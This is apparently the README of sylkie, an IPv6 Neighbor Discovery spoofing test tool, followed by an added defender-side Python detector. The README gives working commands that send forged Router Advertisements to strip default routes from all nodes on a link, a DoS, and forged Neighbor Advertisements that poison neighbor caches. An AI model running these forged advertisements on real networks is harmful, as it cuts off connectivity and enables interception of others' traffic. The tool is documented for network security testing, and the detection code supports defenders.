Sylkie - IPv6 address spoofing

A command line tool and library for testing networks for common address spoofing security vulnerabilities in IPv6 networks using the Neighbor Discovery Protocol.

Build

Get the code and compile it!

Code:
# Get the code
git clone https://github.com/dlrobertson/sylkie
cd ./sylkie

# Compile the code
mkdir -p ./build
cd ./build
cmake -DCMAKE_BUILD_TYPE=Release ..
make
make install

Basic usage

The following describes the basic usage of sylkie. Run sylkie -h or sylkie <subcommand> -h for more details or check out Advanced Usage for more examples.

Note: sylkie uses raw sockets to send the forged advertisements. As a result, the executable must either have the setuid bit set, or it must be run as root.

DoS (Router Advert)

The basic usage of the router-advert command is listed below. This command will send a Router Advertisement message to the given IP or the all-nodes multicast address, causing the targeted nodes to remove <router-ip>/<prefix> from their list of default routes.

sylkie ra -i <interface> \
   --target-mac <mac of router> \
   --router-ip <ip of router> \
   --prefix <router prefix> \
   --timeout <time between adverts> \
   --repeat <number of times to send the request>

Router Advert Examples

A basic example.

sylkie ra -i ens3 \
   --target-mac 52:54:00:e3:f4:06 \
   --router-ip fe80::b95b:ee1:cafe:9720 \
   --prefix 64 \
   --repeat -1 \
   --timeout 10

This would send a "forged" Router Advertisement to the link local scope all-nodes address ff02::1 causing all of the nodes to remove fe80::b95b:ee1:cafe:9720/64 (link-layer address 52:54:00:e3:f4:06) from their list of default routes.

Address spoofing (Neighbor Advert)

The basic usage of the sylkie neighbor advert command is listed below. This command will send a forged Neighbor Advertisement message to the given ip.

sylkie na -i <interface> \
   --dst-mac <dest hw addr> \
   --src-ip <source ip> \
   --dst-ip <dest ip address> \
   --target-ip <target ip address> \
   --target-mac <target mac address> \
   --timeout <time between adverts> \
   --repeat <number of times to send the request>

Neighbor Advert examples

A basic example.

sylkie na -i ens3 \
   --dst-mac 52:54:00:e3:f4:06 \
   --src-ip fe80::61ad:fda3:3032:f6f4 \
   --dst-ip fe80::b95b:ee1:cafe:9720 \
   --target-ip fe80::61ad:fda3:3032:f6f4 \
   --target-mac 52:54:00:c2:a7:7c \
   --repeat -1 \
   --timeout 3

This would send a "forged" Neighbor Advertisement message to dst-ip (fe80::b95b:ee1:cafe:9720), causing the hardware address in the neighbor cache for the target-ip (fe80::61ad:fda3:3032:f6f4) to be updated to the target-mac (52:54:00:c2:a7:7c).

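Added example, not part of the original post or the sylkie project: a defender-side check that flags the two message types described above from captured ICMPv6 payloads. It assumes the forged Router Advertisement takes the RFC 4861 form that removes a default router (Router Lifetime 0); the function names, alert labels and BASELINE_MAC are hypothetical.

```python
import ipaddress
import struct

ROUTER_ADVERT, NEIGHBOR_ADVERT = 134, 136  # ICMPv6 types (RFC 4861)
OPT_TARGET_LLADDR = 2                      # Target Link-Layer Address option

def target_lladdr(options):
    """Return the MAC from the Target Link-Layer Address option, or None."""
    while len(options) >= 8:
        opt_type, units = options[0], options[1]  # length is in 8-byte units
        if units == 0:                            # malformed option: stop parsing
            return None
        if opt_type == OPT_TARGET_LLADDR:
            return options[2:8].hex(":")
        options = options[units * 8:]
    return None

def inspect(src, icmp6, neighbors):
    """Check one ICMPv6 message from `src` against a trusted {ip: mac} table."""
    alerts = []
    if len(icmp6) >= 16 and icmp6[0] == ROUTER_ADVERT:
        # Router Lifetime 0 tells hosts to drop `src` as a default router. A router
        # shutting down sends this too, so correlate with planned changes.
        if struct.unpack_from("!H", icmp6, 6)[0] == 0:
            alerts.append(("ra-lifetime-zero", src))
    elif len(icmp6) >= 24 and icmp6[0] == NEIGHBOR_ADVERT:
        target = str(ipaddress.IPv6Address(icmp6[8:24]))
        mac, known = target_lladdr(icmp6[24:]), neighbors.get(target)
        if mac and known and mac != known:
            override = bool(icmp6[4] & 0x20)      # O flag: replace cached entry
            alerts.append(("na-rebind", target, known, mac, override))
        elif mac and known is None:
            neighbors[target] = mac               # first sighting: learn binding
    return alerts

# Constructed samples (checksums zeroed) built from the addresses in the examples
# above; BASELINE_MAC is a made-up "real" MAC for the spoofed neighbor.
ROUTER, NEIGHBOR = "fe80::b95b:ee1:cafe:9720", "fe80::61ad:fda3:3032:f6f4"
BASELINE_MAC = "52:54:00:aa:bb:cc"
SAMPLE_RA = struct.pack("!BBHBBHII", ROUTER_ADVERT, 0, 0, 64, 0, 0, 0, 0)
SAMPLE_NA = (struct.pack("!BBHI", NEIGHBOR_ADVERT, 0, 0, 0x20000000)
             + ipaddress.IPv6Address(NEIGHBOR).packed
             + bytes([OPT_TARGET_LLADDR, 1]) + bytes.fromhex("525400c2a77c"))

if __name__ == "__main__":
    table = {NEIGHBOR: BASELINE_MAC}
    for src, msg in ((ROUTER, SAMPLE_RA), (NEIGHBOR, SAMPLE_NA)):
        print(inspect(src, msg, table))
```

The trusted table is never overwritten by a conflicting advertisement, so a rebind keeps alerting until someone confirms the change and updates the baseline.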